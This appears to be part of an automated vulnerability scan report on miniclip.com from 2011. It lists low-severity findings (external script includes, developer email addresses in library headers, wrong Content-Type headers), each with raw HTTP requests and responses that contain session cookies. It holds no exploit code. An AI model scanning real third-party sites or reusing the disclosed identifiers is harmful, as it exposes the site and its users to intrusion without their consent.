codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" id="Ad_that_changes_background_AS1" width="300" height="250" align="middle"> <param name="allowScriptAccess" value="always" />...[SNIP]...
5. Cross-domain script include
previous
next
There are 2 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
5.1. http://www.miniclip.com/games/american-football/en/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/games/american-football/en/
Issue detail
The response dynamically includes the following scripts from other domains:http://ads1.msn.com/library/dap.js http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://apis.google.com/js/plusone.js http://pixel.quantserve.com/api/segments.json?a=p-fbx-5O_1W25Cg&callback=qc_callback http://platform.twitter.com/widgets.js
Request
GET /games/american-football/en/ HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2893; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2297; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.3.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:46:33 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:46:33 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-position2:gamepage=true; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:gamepage=false; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:gamepage=false; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 99299 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>American Football - American Footbal...[SNIP]... </script> <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-fbx-5O_1W25Cg&callback=qc_callback" > </script> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"> </script>...[SNIP]... </a> <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... </noscript><script type="text/javascript" src="http://apis.google.com/js/plusone.js"> {lang: 'en-GB'} </script>...[SNIP]...
5.2. http://www.miniclip.com/games/en/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/games/en/
Issue detail
The response dynamically includes the following scripts from other domains:http://ads1.msn.com/library/dap.js http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://apis.google.com/js/plusone.js http://pixel.quantserve.com/api/segments.json?a=p-fbx-5O_1W25Cg&callback=qc_callback http://platform.twitter.com/widgets.js
Request
GET /games/en/ HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://borneomanagement.com/ Cookie: ipLocation=US; language=en
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:43:54 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:43:54 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 100369 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <!-- TradeDoubler site verification 1775255 ...[SNIP]... </script> <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-fbx-5O_1W25Cg&callback=qc_callback" > </script> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"> </script>...[SNIP]... </a> <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... </noscript><script type="text/javascript" src="http://apis.google.com/js/plusone.js"> {lang: 'en-GB'} </script>...[SNIP]...
6. Email addresses disclosed
previous
next
There are 2 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content. However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
6.1. http://www.miniclip.com/scripts/sketchstar/controls.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/scripts/sketchstar/controls.js
Issue detail
The following email address was disclosed in the response:
Request
GET /scripts/sketchstar/controls.js HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.miniclip.com Cookie: OAX=rcHW804mwDIABzb3
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Last-Modified: Thu, 20 Nov 2008 14:35:16 GMT ETag: "2602347-8834-45c1fd64db100" Content-Type: application/x-javascript X-Cacheable: YES Content-Length: 34868 Date: Wed, 20 Jul 2011 11:48:40 GMT X-Varnish: 915967901 915964355 Age: 121 Via: 1.1 varnish Connection: keep-alive X-Served-By: webftl129 X-Cache: HIT X-Cache-Hits: 2 // script.aculo.us controls.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008 // Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2007 Ivan Krstic (htt...[SNIP]... <tdd@tddsworld.com >...[SNIP]...
6.2. http://www.miniclip.com/scripts/sketchstar/dragdrop.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/scripts/sketchstar/dragdrop.js
Issue detail
The following email address was disclosed in the response:sammi@oriontransfer.co.nz
Request
GET /scripts/sketchstar/dragdrop.js HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.miniclip.com Cookie: OAX=rcHW804mwDIABzb3
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Last-Modified: Thu, 20 Nov 2008 14:35:12 GMT ETag: "784c76-7b75-45c1fd610a800" Content-Type: application/x-javascript X-Cacheable: YES Content-Length: 31605 Date: Wed, 20 Jul 2011 11:48:40 GMT X-Varnish: 847838130 847824416 Age: 461 Via: 1.1 varnish Connection: keep-alive X-Served-By: webftl18 X-Cache: HIT X-Cache-Hits: 4 // script.aculo.us dragdrop.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008 // Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz ) // // script.aculo.us is freely distributable under the terms of an MIT-style license. // For details, see the script.aculo.us web site: http://script.aculo.us/ if(Object.isUndefined(Effect)) thr...[SNIP]...
7. Content type incorrectly stated
previous
There are 4 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
7.1. http://www.miniclip.com/facebook/facebook.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.miniclip.com
Path:
/facebook/facebook.js
Issue detail
The response contains the following Content-type statement:Content-Type: text/html; charset=iso-8859-1 The response states that it contains HTML . However, it actually appears to contain plain text .
Request
GET /facebook/facebook.js HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.miniclip.com Cookie: OAX=rcHW804mwDIABzb3
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8Content-Type: text/html; charset=iso-8859-1 X-Cacheable: YES Content-Length: 14 Date: Wed, 20 Jul 2011 11:54:55 GMT X-Varnish: 1824496496 1824480177 Age: 547 Via: 1.1 varnish Connection: keep-alive X-Served-By: webftl59 X-Cache: HIT X-Cache-Hits: 1 File Not Found
7.2. http://www.miniclip.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.miniclip.com
Path:
/favicon.ico
Issue detail
The response contains the following Content-type statement:Content-Type: text/plain; charset=UTF-8 The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Request
GET /favicon.ico HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2229; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Last-Modified: Fri, 07 Jul 2006 15:11:37 GMT ETag: "77f343-3aee-417ff47e2fc40"Content-Type: text/plain; charset=UTF-8 X-Cacheable: YES Content-Length: 15086 Date: Wed, 20 Jul 2011 11:44:11 GMT X-Varnish: 1515167138 1515161150 Age: 209 Via: 1.1 varnish Connection: keep-alive X-Served-By: webftl09 X-Cache: HIT X-Cache-Hits: 11 ............ .h...6... .... .........00.... ..%..F...(....... ..... .....@................................................................................................................................[SNIP]...
7.3. http://www.miniclip.com/images/icon_c_and.png
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.miniclip.com
Path:
/images/icon_c_and.png
Issue detail
The response contains the following Content-type statement:The response states that it contains a PNG image . However, it actually appears to contain a JPEG image .
Request
GET /images/icon_c_and.png HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.miniclip.com Cookie: OAX=rcHW804mwDIABzb3
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Last-Modified: Tue, 17 Nov 2009 13:48:22 GMT ETag: "1d806a5-165-4789161213580"Content-Type: image/png X-Cacheable: YES Content-Length: 357 Date: Wed, 20 Jul 2011 11:51:43 GMT X-Varnish: 582760534 582757425 Age: 102 Via: 1.1 varnish Connection: keep-alive X-Served-By: webftl49 X-Cache: HIT X-Cache-Hits: 1 ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ..................................................................................................................[SNIP]...
7.4. http://www.miniclip.com/php/services/notification.php
previous
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.miniclip.com
Path:
/php/services/notification.php
Issue detail
The response contains the following Content-type statement:Content-Type: text/html; charset=UTF-8 The response states that it contains HTML . However, it actually appears to contain plain text .
Request
GET /php/services/notification.php HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: application/json, text/javascript, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2229; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:44:00 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Content-Length: 5Content-Type: text/html; charset=UTF-8 false
Report generated by XSS.CX at Wed Jul 20 06:56:54 CDT 2011.